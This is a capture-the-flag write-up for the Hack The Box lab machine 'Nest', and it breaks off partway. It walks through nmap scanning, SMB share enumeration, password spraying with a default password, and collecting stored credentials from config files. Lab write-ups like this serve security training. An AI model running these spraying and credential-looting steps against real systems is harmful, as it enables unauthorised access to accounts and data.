Nest HackTheBox
Difficulty = Easy
IP Address = 10.10.10.178
Nmap Scan:
# Nmap 7.92 scan initiated Tue Feb 7 01:45:24 2023 as: nmap -sCV -A -p445,4386 -oN nmapscan -Pn 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.92%I=7%D=2/7%Time=63E19F2C%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\x
SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\x
SF:20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20the
SF:\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---\
SF:r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\n
SF:DEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCookie
SF:,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionRe
SF:q,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20c
SF:ommand\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Re
SF:porting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>");
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-07T00:48:14
|_ start_date: 2023-02-07T00:06:46
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 7 01:48:54 2023 -- 1 IP address (1 host up) scanned in 209.13 seconds
Checking smb
βββ(venv)β(mark__haxor)-[/tmp/pwn]
ββ$ smbclient -L 10.10.10.178
Password for [WORKGROUP\mark]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.178 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
Iβll check if i can connect to the shares in the smb
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ smbclient //10.10.10.178/Data
Password for [WORKGROUP\mark]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Aug 7 23:53:46 2019
.. D 0 Wed Aug 7 23:53:46 2019
IT D 0 Wed Aug 7 23:58:07 2019
Production D 0 Mon Aug 5 22:53:38 2019
Reports D 0 Mon Aug 5 22:53:44 2019
Shared D 0 Wed Aug 7 20:07:51 2019
5242623 blocks of size 4096. 1840001 blocks available
smb: \> q
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ smbclient //10.10.10.178/Users
Password for [WORKGROUP\mark]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 00:04:21 2020
.. D 0 Sun Jan 26 00:04:21 2020
Administrator D 0 Fri Aug 9 16:08:23 2019
C.Smith D 0 Sun Jan 26 08:21:44 2020
L.Frost D 0 Thu Aug 8 18:03:01 2019
R.Thompson D 0 Thu Aug 8 18:02:50 2019
TempUser D 0 Wed Aug 7 23:55:56 2019
5242623 blocks of size 4096. 1840001 blocks available
smb: \> q
Iβll try mounting it and accessing what is in those shares
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ mkdir mount
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo mount -t cifs -o 'user=anonymous' //10.10.10.178/Data mount
[sudo] password for mark:
Password for anonymous@//10.10.10.178/Data:
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ mkdir mount2
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo mount -t cifs -o 'user=anonymous' //10.10.10.178/Users mount2
Password for anonymous@//10.10.10.178/Users:
Now time to see if i can loot anything from here
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount]
ββ$ ls -R .
.:
IT Production Reports Shared
./IT:
ls: reading directory './IT': Permission denied
./Production:
ls: reading directory './Production': Permission denied
./Reports:
ls: reading directory './Reports': Permission denied
./Shared:
Maintenance Templates
./Shared/Maintenance:
'Maintenance Alerts.txt'
./Shared/Templates:
HR Marketing
./Shared/Templates/HR:
'Welcome Email.txt'
./Shared/Templates/Marketing:
We canβt view most directories so iβll check out the ones we have access to
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount]
ββ$ cd Shared/Templates/HR
βββ(venv)β(mark__haxor)-[~/_/mount/Shared/Templates/HR]
ββ$ ls
'Welcome Email.txt'
βββ(venv)β(mark__haxor)-[~/_/mount/Shared/Templates/HR]
ββ$ cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
HR
This is a welcome email saying all users should keep their username as Firstname Surname
Also thereβs a cred which we can use to access the user share
THe other file doesnβt contain much
βββ(venv)β(mark__haxor)-[~/_/Nest/mount/Shared/Maintenance]
ββ$ cat Maintenance\ Alerts.txt
There is currently no scheduled maintenance work
Now iβll unmount the first share
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo umount mount
[sudo] password for mark:
On attempting to list files in the second mounted directory we get permission denied as expected cause this requires valid cred to list shares
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ cd mount2
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ ls
Administrator C.Smith L.Frost R.Thompson TempUser
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ ls -R
.:
Administrator C.Smith L.Frost R.Thompson TempUser
./Administrator:
ls: reading directory './Administrator': Permission denied
./C.Smith:
ls: reading directory './C.Smith': Permission denied
./L.Frost:
ls: reading directory './L.Frost': Permission denied
./R.Thompson:
ls: reading directory './R.Thompson': Permission denied
./TempUser:
ls: reading directory './TempUser': Permission denied
So iβll use the TempUser cred to mount the user share
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo umount mount2
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo mount -t cifs -o 'user=TempUser' //10.10.10.178/Users mount2
Password for TempUser@//10.10.10.178/Users:
Checking if we can list directory
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ cd mount2
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ ls -R .
.:
Administrator C.Smith L.Frost R.Thompson TempUser
./Administrator:
ls: reading directory './Administrator': Permission denied
./C.Smith:
ls: reading directory './C.Smith': Permission denied
./L.Frost:
ls: reading directory './L.Frost': Permission denied
./R.Thompson:
ls: reading directory './R.Thompson': Permission denied
./TempUser:
'New Text Document.txt'
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ cd TempUser
βββ(venv)β(mark__haxor)-[~/_/HTB/Nest/mount2/TempUser]
ββ$ cat New\ Text\ Document.txt
Still not full access yet. If you notice the password for the TempUser which is welcome2019 it is possible for any of the user to have not changed his/her cred from the default one
Iβll attempt to spray the password over smb
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ ls
Administrator C.Smith L.Frost R.Thompson TempUser
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ ls > ../users
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ cd ..
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ cat users
Administrator
C.Smith
L.Frost
R.Thompson
TempUser
Now using crackmapexec iβll attempt to perform password spraying using the cred welcome2019 on the user list
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ crackmapexec smb 10.10.10.178 -u users -p welcome2019
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [-] HTB-NEST\Administrator:welcome2019 STATUS_LOGON_FAILURE
SMB 10.10.10.178 445 HTB-NEST [-] HTB-NEST\C.Smith:welcome2019 STATUS_LOGON_FAILURE
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\L.Frost:welcome2019
It worked we have another valid cred L.Frost:welcome2019
Let see what this user have access to
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ smbmap -H 10.10.10.178 -u L.Frost -p welcome2019
[+] Guest session IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ NO ACCESS
Users READ ONLY
Just the data & user share
Iβll mount it as i did before using the userβs cred
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo mount -t cifs -o 'user=L.Frost' //10.10.10.178/Users mount2
Password for L.Frost@//10.10.10.178/Users:
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo mount -t cifs -o 'user=L.Frost' //10.10.10.178/Data mount
Password for L.Frost@//10.10.10.178/Data:
Loot for stuffs again
Nothin really interesting in the Data share
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ cd mount
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount]
ββ$ ls -R .
.:
IT Production Reports Shared
./IT:
ls: reading directory './IT': Permission denied
./Production:
ls: reading directory './Production': Permission denied
./Reports:
ls: reading directory './Reports': Permission denied
./Shared:
Maintenance Templates
./Shared/Maintenance:
'Maintenance Alerts.txt'
./Shared/Templates:
HR Marketing
./Shared/Templates/HR:
'Welcome Email.txt'
./Shared/Templates/Marketing:
This is weird not much access here
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ cd mount2
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ ls -R .
.:
Administrator C.Smith L.Frost R.Thompson TempUser
./Administrator:
ls: reading directory './Administrator': Permission denied
./C.Smith:
ls: reading directory './C.Smith': Permission denied
./L.Frost:
ls: reading directory './L.Frost': Permission denied
./R.Thompson:
ls: reading directory './R.Thompson': Permission denied
./TempUser:
ls: reading directory './TempUser': Permission denied
Now on remembering the spraying i did it didnβt really spray on all users it stopped when it got a successfull login
So iβll rerun the password spray but this time add a switch to keep it running even tho it gets a valid login
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ crackmapexec smb 10.10.10.178 -u users -p welcome2019 --continue-on-success
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [-] HTB-NEST\Administrator:welcome2019 STATUS_LOGON_FAILURE
SMB 10.10.10.178 445 HTB-NEST [-] HTB-NEST\C.Smith:welcome2019 STATUS_LOGON_FAILURE
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\L.Frost:welcome2019
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\R.Thompson:welcome2019
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\TempUser:welcome2019
Cool we have another user iβll check what share he has access to and mount it
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ smbmap -H 10.10.10.178 -u R.Thompson -p welcome2019
[+] Guest session IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ NO ACCESS
Users READ ONLY
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo mount -t cifs -o 'user=R.Thompson' //10.10.10.178/Data mount
Password for R.Thompson@//10.10.10.178/Data:
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo mount -t cifs -o 'user=R.Thompson' //10.10.10.178/Users mount2
Password for R.Thompson@//10.10.10.178/Users:
Looting stuffs again
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ cd mount
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount]
ββ$ ls -R .
.:
IT Production Reports Shared
./IT:
ls: reading directory './IT': Permission denied
./Production:
ls: reading directory './Production': Permission denied
./Reports:
ls: reading directory './Reports': Permission denied
./Shared:
Maintenance Templates
./Shared/Maintenance:
'Maintenance Alerts.txt'
./Shared/Templates:
HR Marketing
./Shared/Templates/HR:
'Welcome Email.txt'
./Shared/Templates/Marketing:
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount]
ββ$ cd ..
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ cd mount2
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount2]
ββ$ ls -R .
.:
Administrator C.Smith L.Frost R.Thompson TempUser
./Administrator:
ls: reading directory './Administrator': Permission denied
./C.Smith:
ls: reading directory './C.Smith': Permission denied
./L.Frost:
ls: reading directory './L.Frost': Permission denied
./R.Thompson:
ls: reading directory './R.Thompson': Permission denied
./TempUser:
ls: reading directory './TempUser': Permission denied
Damnn i got nothing
I figured out the problem. Using any cred whether correct or not to connect to share will work
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ smbclient //10.10.10.178/Users -U R.Thompson
Password for [WORKGROUP\R.Thompson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 00:04:21 2020
.. D 0 Sun Jan 26 00:04:21 2020
Administrator D 0 Fri Aug 9 16:08:23 2019
C.Smith D 0 Sun Jan 26 08:21:44 2020
L.Frost D 0 Thu Aug 8 18:03:01 2019
R.Thompson D 0 Thu Aug 8 18:02:50 2019
TempUser D 0 Wed Aug 7 23:55:56 2019
5242623 blocks of size 4096. 1839999 blocks available
smb: \> q
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ smbclient //10.10.10.178/Users -U R.Thompson
Password for [WORKGROUP\R.Thompson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 00:04:21 2020
.. D 0 Sun Jan 26 00:04:21 2020
Administrator D 0 Fri Aug 9 16:08:23 2019
C.Smith D 0 Sun Jan 26 08:21:44 2020
L.Frost D 0 Thu Aug 8 18:03:01 2019
R.Thompson D 0 Thu Aug 8 18:02:50 2019
TempUser D 0 Wed Aug 7 23:55:56 2019
5242623 blocks of size 4096. 1839999 blocks available
smb: \> q
So i have no idea why crackmapexec gave that result π€
Anyways iβll try mounting share again as TempUser cause i figured out that thereβs a directory which i missed π
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ sudo mount -t cifs -o 'user=TempUser' //10.10.10.178/Data mount
Password for TempUser@//10.10.10.178/Data:
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ cd mount
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount]
ββ$ tree
.
βββ IT
β__ βββ Archive
β__ βββ Configs
β__ β__ βββ Adobe
β__ β__ β__ βββ editing.xml
β__ β__ β__ βββ Options.txt
β__ β__ β__ βββ projects.xml
β__ β__ β__ βββ settings.xml
β__ β__ βββ Atlas
β__ β__ β__ βββ Temp.XML
β__ β__ βββ DLink
β__ β__ βββ Microsoft
β__ β__ β__ βββ Options.xml
β__ β__ βββ NotepadPlusPlus
β__ β__ β__ βββ config.xml
β__ β__ β__ βββ shortcuts.xml
β__ β__ βββ RU Scanner
β__ β__ β__ βββ RU_config.xml
β__ β__ βββ Server Manager
β__ βββ Installs
β__ βββ Reports
β__ βββ Tools
βββ Production
βββ Reports
βββ Shared
βββ Maintenance
β__ βββ Maintenance Alerts.txt
βββ Templates
βββ HR
β__ βββ Welcome Email.txt
βββ Marketing
20 directories, 11 files
Ah cool we get more output so the problem was cause i used ls -R .
Anyways we some that most files in there are .xml file and thereβs a NotePadPlusPlus config file among it
Iβll cat the file to know its content, but for some reason it doesnβt show
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount]
ββ$ cp IT/Archive/Configs/NotepadPlusPlus/config.xml ../
cp: cannot stat 'IT/Archive/Configs/NotepadPlusPlus/config.xml': No such file or directory
βββ(venv)β(mark__haxor)-[~/_/B2B/HTB/Nest/mount]
ββ$ cd IT/Archive
βββ(venv)β(mark__haxor)-[~/_/Nest/mount/IT/Archive]
ββ$ ls
βββ(venv)β(mark__haxor)-[~/_/Nest/mount/IT/Archive]
ββ$ ls -al
total 4
drwxr-xr-x 2 root root 0 Aug 5 2019 .
drwxr-xr-x 2 root root 4096 Aug 7 2019 ..
Iβll get it by just connecting to the share
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ smbclient -U TempUser //10.10.10.178/data
Password for [WORKGROUP\TempUser]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Aug 7 23:53:46 2019
.. D 0 Wed Aug 7 23:53:46 2019
IT D 0 Wed Aug 7 23:58:07 2019
Production D 0 Mon Aug 5 22:53:38 2019
Reports D 0 Mon Aug 5 22:53:44 2019
Shared D 0 Wed Aug 7 20:07:51 2019
5242623 blocks of size 4096. 1839999 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Shared/Maintenance/Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \IT\Configs\Adobe\editing.xml of size 246 as IT/Configs/Adobe/editing.xml (0.5 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \IT\Configs\Adobe\Options.txt of size 0 as IT/Configs/Adobe/Options.txt (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \IT\Configs\Adobe\projects.xml of size 258 as IT/Configs/Adobe/projects.xml (0.5 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \IT\Configs\Adobe\settings.xml of size 1274 as IT/Configs/Adobe/settings.xml (1.9 KiloBytes/sec) (average 0.7 KiloBytes/sec)
getting file \IT\Configs\Atlas\Temp.XML of size 1369 as IT/Configs/Atlas/Temp.XML (2.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
getting file \IT\Configs\Microsoft\Options.xml of size 4598 as IT/Configs/Microsoft/Options.xml (6.7 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as IT/Configs/NotepadPlusPlus/config.xml (9.3 KiloBytes/sec) (average 3.1 KiloBytes/sec)
getting file \IT\Configs\NotepadPlusPlus\shortcuts.xml of size 2108 as IT/Configs/NotepadPlusPlus/shortcuts.xml (2.8 KiloBytes/sec) (average 3.0 KiloBytes/sec)
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as IT/Configs/RU Scanner/RU_config.xml (0.5 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Shared/Templates/HR/Welcome Email.txt (0.8 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> q
Now iβll cat the file
<?xml version="1.0" encoding="Windows-1252" ?>
<NotepadPlus>
<GUIConfigs>
<!-- 3 status : "large", "small" or "hide"-->
<GUIConfig name="ToolBar" visible="yes">standard</GUIConfig>
<!-- 2 status : "show" or "hide"-->
<GUIConfig name="StatusBar">show</GUIConfig>
<!-- For all attributs, 2 status : "yes" or "no"-->
<GUIConfig name="TabBar" dragAndDrop="yes" drawTopBar="yes" drawInactiveTab="yes" reduce="yes" closeButton="no" doubleClick2Close="no" vertical="no" multiLine="no" hide="no" />
<!-- 2 positions : "horizontal" or "vertical"-->
<GUIConfig name="ScintillaViewsSplitter">vertical</GUIConfig>
<!-- For the attribut of position, 2 status : docked or undocked ; 2 status : "show" or "hide" -->
<GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig>
<GUIConfig name="TabSetting" size="4" replaceBySpace="no" />
<!--App position-->
<GUIConfig name="AppPosition" x="662" y="95" width="955" height="659" isMaximized="yes" />
<!-- For the primary scintilla view,
2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" -->
<GUIConfig name="ScintillaPrimaryView" lineNumberMargin="show" bookMarkMargin="show" folderMarkStyle="box" indentGuideLine="show" currentLineHilitingShow="show" Wrap="yes" edge="no" edgeNbColumn="100" wrapSymbolShow="hide" zoom="0" whiteSpaceShow="hide" eolShow="hide" lineWrapMethod="aligned" zoom2="0" />
<!-- For the secodary scintilla view,
2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" -->
<GUIConfig name="Auto-detection">yes</GUIConfig>
<GUIConfig name="CheckHistoryFiles">no</GUIConfig>
<GUIConfig name="TrayIcon">no</GUIConfig>
<GUIConfig name="RememberLastSession">yes</GUIConfig>
<!--
New Document default settings :
format = 0/1/2 -> win/unix/mac
encoding = 0/1/2/3/4/5 -> ANSI/UCS2Big/UCS2small/UTF8/UTF8-BOM
defaultLang = 0/1/2/..
Note 1 : UTF8-BOM -> UTF8 without BOM
Note 2 : for defaultLang :
0 -> L_TXT
1 -> L_PHP
... (see source file)
-->
<GUIConfig name="NewDocDefaultSettings" format="0" encoding="0" lang="0" codepage="-1" openAnsiAsUTF8="no" />
<GUIConfig name="langsExcluded" gr0="0" gr1="0" gr2="0" gr3="0" gr4="0" gr5="0" gr6="0" gr7="0" langMenuCompact="yes" />
<!--
printOption is print colour setting, the following values are possible :
0 : WYSIWYG
1 : Invert colour
2 : B & W
3 : WYSIWYG but without background colour
-->
<GUIConfig name="Print" lineNumber="no" printOption="0" headerLeft="$(FULL_CURRENT_PATH)" headerMiddle="" headerRight="$(LONG_DATE) $(TIME)" headerFontName="IBMPC" headerFontStyle="1" headerFontSize="8" footerLeft="" footerMiddle="-$(CURRENT_PRINTING_PAGE)-" footerRight="" footerFontName="" footerFontStyle="0" footerFontSize="9" margeLeft="0" margeTop="0" margeRight="0" margeBottom="0" />
<!--
Backup Setting :
0 : non backup
1 : simple backup
2 : verbose backup
-->
<GUIConfig name="Backup" action="0" useCustumDir="no" dir="" />
<GUIConfig name="TaskList">yes</GUIConfig>
<GUIConfig name="SaveOpenFileInSameDir">no</GUIConfig>
<GUIConfig name="noUpdate" intervalDays="15" nextUpdateDate="20080426">no</GUIConfig>
<GUIConfig name="MaitainIndent">yes</GUIConfig>
<GUIConfig name="MRU">yes</GUIConfig>
<GUIConfig name="URL">0</GUIConfig>
<GUIConfig name="globalOverride" fg="no" bg="no" font="no" fontSize="no" bold="no" italic="no" underline="no" />
<GUIConfig name="auto-completion" autoCAction="0" triggerFromNbChar="1" funcParams="no" />
<GUIConfig name="sessionExt"></GUIConfig>
<GUIConfig name="SmartHighLight">yes</GUIConfig>
<GUIConfig name="TagsMatchHighLight" TagAttrHighLight="yes" HighLightNonHtmlZone="no">yes</GUIConfig>
<GUIConfig name="MenuBar">show</GUIConfig>
<GUIConfig name="Caret" width="1" blinkRate="250" />
<GUIConfig name="ScintillaGlobalSettings" enableMultiSelection="no" />
<GUIConfig name="openSaveDir" value="0" defaultDirPath="" />
<GUIConfig name="titleBar" short="no" />
<GUIConfig name="DockingManager" leftWidth="200" rightWidth="200" topHeight="200" bottomHeight="266">
<FloatingWindow cont="4" x="39" y="109" width="531" height="364" />
<PluginDlg pluginName="dummy" id="0" curr="3" prev="-1" isVisible="yes" />
<PluginDlg pluginName="NppConverter.dll" id="3" curr="4" prev="0" isVisible="no" />
<ActiveTabs cont="0" activeTab="-1" />
<ActiveTabs cont="1" activeTab="-1" />
<ActiveTabs cont="2" activeTab="-1" />
<ActiveTabs cont="3" activeTab="-1" />
</GUIConfig>
</GUIConfigs>
<!-- The History of opened files list -->
<FindHistory nbMaxFindHistoryPath="10" nbMaxFindHistoryFilter="10" nbMaxFindHistoryFind="10" nbMaxFindHistoryReplace="10" matchWord="no" matchCase="no" wrap="yes" directionDown="yes" fifRecuisive="yes" fifInHiddenFolder="no" dlgAlwaysVisible="no" fifFilterFollowsDoc="no" fifFolderFollowsDoc="no" searchMode="0" transparencyMode="0" transparency="150">
<Find name="text" />
<Find name="txt" />
<Find name="itx" />
<Find name="iTe" />
<Find name="IEND" />
<Find name="redeem" />
<Find name="activa" />
<Find name="activate" />
<Find name="redeem on" />
<Find name="192" />
<Replace name="C_addEvent" />
</FindHistory>
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
</NotepadPlus>
Thereβs lot of stuff in it and noticing the find history tag we see there are path disclosed
Lookin at the files thereβs another config file
IT/Configs/RU Scanner/RU_config.xml
Iβll cat the file
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
Cool we have the cred for another user called c.smith and her password which is encrypted
Now we know theres a path which is leaked from the notepadplusplus config file
Iβll try accessing it
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ smbclient -U TempUser '//10.10.10.178/Secure$'
Password for [WORKGROUP\TempUser]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 8 00:08:12 2019
.. D 0 Thu Aug 8 00:08:12 2019
Finance D 0 Wed Aug 7 20:40:13 2019
HR D 0 Thu Aug 8 00:08:11 2019
IT D 0 Thu Aug 8 11:59:25 2019
5242623 blocks of size 4096. 1839999 blocks available
smb: \> cd IT\Carl
smb: \IT\Carl\> ls
. D 0 Wed Aug 7 20:42:14 2019
